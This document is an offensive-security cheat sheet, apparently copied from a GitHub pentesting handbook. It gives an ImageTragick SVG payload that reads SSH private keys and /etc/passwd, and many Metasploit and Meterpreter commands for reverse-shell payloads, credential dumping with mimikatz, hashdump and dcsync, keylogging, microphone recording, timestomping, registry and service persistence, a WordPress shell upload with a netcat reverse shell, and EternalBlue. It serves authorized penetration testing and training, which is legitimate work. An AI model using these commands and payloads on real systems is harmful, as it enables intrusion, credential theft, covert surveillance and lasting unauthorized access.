description: >- Refernce : https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md
Exploitation notes
Exploitation Tools
Table of Contents
Resources
| Name | Description | URL |
|---|---|---|
| Evil-WinRM | The ultimate WinRM shell for hacking/pentesting | https://github.com/Hackplayers/evil-winrm |
| Exploitalert | Listing of latest Exploits | https://exploitalert.com |
| Metasploit | Metasploit Framework | https://github.com/rapid7/metasploit-framework |
| TheFatRat | TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. | https://github.com/Screetsec/TheFatRat |
ImageTragick
MSL / Polyglot Attack
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
poc.svg
<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
Executing Payload
$ convert poc.svg poc.png
$ cp /tmp/poc.svg /var/www/html/convert_images/
Metasploit
General Usage
$ sudo msfdb run // start database
$ sudo msfdb init // database initialization
$ msfdb --use-defaults delete // delete existing databases
$ msfdb --use-defaults init // database initialization
$ msfdb status // database status
msf6 > workspace // metasploit workspaces
msf6 > workspace -a <WORKSPACE> // add a workspace
msf6 > workspace -r <WORKSPACE> // rename a workspace
msf6 > workspace -d <WORKSPACE> // delete a workspace
msf6 > workspace -D // delete all workspaces
msf6 > db_nmap <OPTIONS> // execute nmap and add output to database
msf6 > hosts // reads hosts from database
msf6 > services // reads services from database
msf6 > vulns // displaying vulnerabilities
msf6 > search // search within metasploit
msf6 > set RHOST <RHOST> // set remote host
msf6 > set RPORT <RPORT> // set remote port
msf6 > run // run exploit
msf6 > spool /PATH/TO/FILE // recording screen output
msf6 > save // saves current state
msf6 > exploit // using module exploit
msf6 > payload // using module payload
msf6 > auxiliary // using module auxiliary
msf6 > encoder // using module encoder
msf6 > nop // using module nop
msf6 > show sessions // displays all current sessions
msf6 > sessions -i 1 // switch to session 1
msf6 > sessions -u <ID> // upgrading shell to meterpreter
msf6 > sessions -k <ID> // kill specific session
msf6 > sessions -K // kill all sessions
msf6 > jobs // showing all current jobs
msf6 > show payloads // displaying available payloads
msf6 > set VERBOSE true // enable verbose output
msf6 > set forceexploit true // exploits the target anyways
msf6 > set EXITFUNC thread // reverse shell can exit without exit the program
msf6 > set AutoLoadStdapi false // disables autoload of stdapi
msf6 > set PrependMigrate true // enables automatic process migration
msf6 > set PrependMigrateProc explorer.exe // auto migrate to explorer.exe
msf6 > use post/PATH/TO/MODULE // use post exploitation module
msf6 > use post/linux/gather/hashdump // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload // use a specific module
C:\> > Ctrl + z // put active meterpreter shell in background
meterpreter > loadstdapi // load stdapi
meterpreter > background // put meterpreter in background (same as "bg")
meterpreter > shell // get a system shell
meterpreter > channel -i <ID> // get back to existing meterpreter shell
meterpreter > ps // checking processes
meterpreter > migrate 2236 // migrate to a process
meterpreter > getuid // get the user id
meterpreter > sysinfo // get system information
meterpreter > search -f <FILE> // search for a file
meterpreter > upload // uploading local files to the target
meterpreter > ipconfig // get network configuration
meterpreter > load powershell // loads powershell
meterpreter > powershell_shell // follow-up command for load powershell
meterpreter > powershell_execute // execute command
meterpreter > powershell_import // import module
meterpreter > powershell_shell // shell
meterpreter > powershell_session_remove // remove
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress' // network discovery
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }' // network scan
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded' // port scan
meterpreter > load kiwi // load mimikatz
meterpreter > help kiwi // mimikatz help
meterpreter > kiwi_cmd // execute mimikatz native command
meterpreter > lsa_dump_sam // lsa sam dump
meterpreter > dcsync_ntlm krbtgt // dc sync
meterpreter > creds_all // dump all credentials
meterpreter > creds_msv // msv dump
meterpreter > creds_kerberos // kerberos dump
meterpreter > creds_ssp // ssp dump
meterpreter > creds_wdigest // wdigest dump
meterpreter > getprivs // get privileges after loading mimikatz
meterpreter > getsystem // gain system privileges if user is member of administrator group
meterpreter > hashdump // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester // checking for exploits
meterpreter > run post/windows/manage/enable_rdp // enables rdp
meterpreter > run post/multi/manage/autoroute // runs autoroutes
meterpreter > run auxiliary/server/socks4a // runs socks4 proxy server
meterpreter > keyscan_start // enabled keylogger
meterpreter > keyscan_dump // showing the output
meterpreter > screenshare // realtime screen sharing
meterpreter > screenshare -q 100 // realtime screen sharing
meterpreter > record_mic // recording mic output
meterpreter > timestomp // modify timestamps
meterpreter > execute -f calc.exe // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1 // port forwarding
Metasploit through Proxychains
$ proxychains -q msfconsole
Meterpreter Listener
Generate Payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
Setup Listener for Microsoft Windows
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
Setup Listener for MacOS
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
Download Files
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
C:\> .\<FILE>.exe
meterpreter > download *
Enumeration
SNMP Scan
msf6 > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_login) > run
SNMP Enum
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Tomcat Enumeration
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
Exploit Suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run
Execute Binaries
Port Forwarding with Chisel
meterpreter > execute -Hf chisel.exe -a "client -v <LHOST>:<LPORT> R:1092:socks"
Pivoting
Port Forwarding with Meterpreter
meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>
meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>
SOCKS Proxy on Meterpreter Sessions
meterpreter > use auxiliary/server/socks_proxy
Pivoting with Meterpreter
meterpreter > run autoroute -s <XXX.XXX.XXX>.0/24
background
msf > use auxiliary/scanner/portscan/tcp
Auxiliary Handling
Auxiliary Setup
msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run
Auxiliary Output Directory
/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
Persistence
Setting up Persistent Access
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
Copy exploit to target machine
msf6 > use exploit/windows/local/persistence
msf6 > set session 1
msf6 > use windows/meterpreter/reverse_tcp
Persistence through persistence_service
msf6 > use exploit/windows/local/persistence_service
msf6 > set session 2
msf6 > set lport 5678
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 5678
msf6 > exploit
Persistence through Persistence_exe
msf6 > use post/windows/manage/persistence_exe
msf6 > set session 1
msf6 > set rexepath /root/payload.exe
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 1234
msf6 > exploit
Persistence through Registry
msf6 > use exploit/windows/local/registry_persistence
msf6 > set session 1
msf6 > set lport 7654
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 7654
msf6 > exploit
Exploit Handling
WP Shell Upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS <RHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST <LHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT <LPORT>
msf6 > run
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > execute -f nc.exe -a "-e cmd.exe <LHOST> <LPORT>"
Dedicated Exploit
msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST <LHOST>
msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
Additional Options
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT <LPORT>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <LHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <RHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
searchsploit
$ searchsploit <NAME>
$ searchsploit --cve <CVE>
$ searchsploit -m <ID>
$ searchsploit -x <ID> / <PATH>